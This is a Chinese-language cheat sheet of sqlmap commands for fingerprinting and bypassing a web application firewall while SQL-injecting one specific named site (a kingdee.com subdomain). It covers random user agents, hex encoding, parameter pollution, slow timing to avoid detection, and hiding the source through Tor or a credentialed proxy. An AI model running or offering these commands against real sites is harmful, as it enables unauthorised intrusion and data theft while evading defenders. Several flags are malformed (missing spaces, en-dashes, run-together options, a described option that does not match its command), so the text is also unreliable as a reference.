检测web服务是否受到防火墙保护
首选
sqlmap -u http://yiliao.kingdee.com/contents.php?id=51&types=4--thread 10 --identify-waf
备选
sqlmap -uhttp://yiliao.kingdee.com/contents.php?id=51&types=4 –thread 10 --check-waf
使用参数绕防火墙
使用任意浏览器进行绕过,尤其是在WAF配置不当的时候
sqlmap -u http://yiliao.kingdee.com/contents.php?id=51&types=4 --random-agent -v2
禁止使用系统的代理,直接连接进行注入
sqlmap -u http://yiliao.kingdee.com/contents.php?id=51&types=4 --ignore-proxy
清空会话,重构注入
sqlmap -u http://yiliao.kingdee.com/contents.php?id=51&types=4 --flush-session
使用参数--no-cast ,进行字符码转换
sqlmap -u http://yiliao.kingdee.com/contents.php?id=51&types=4 --hex
对移动端的服务器进行注入
sqlmap -u http://yiliao.kingdee.com/contents.php?id=51&types=4 –mobile
匿名注入
sqlmap -u http://yiliao.kingdee.com/contents.php?id=51&types=4 –tor
使用HTTP 参数污染进行绕过,尤其是在ASP.NET/IIS 平台上
sqlmap -u http://yiliao.kingdee.com/contents.php?id=51&types=4 --hpp-v 3
使用长的延时来避免触发WAF的机制,这方式比较耗时
sqlmap -u http://yiliao.kingdee.com/contents.php?id=51&types=4 --delay=3.5 --time-sec=60
使用代理进行注入
Sqlmap -u http://yiliao.kingdee.com/contents.php?id=51&types=4 --proxy=211.211.211.211:8080
--proxy-cred=211:985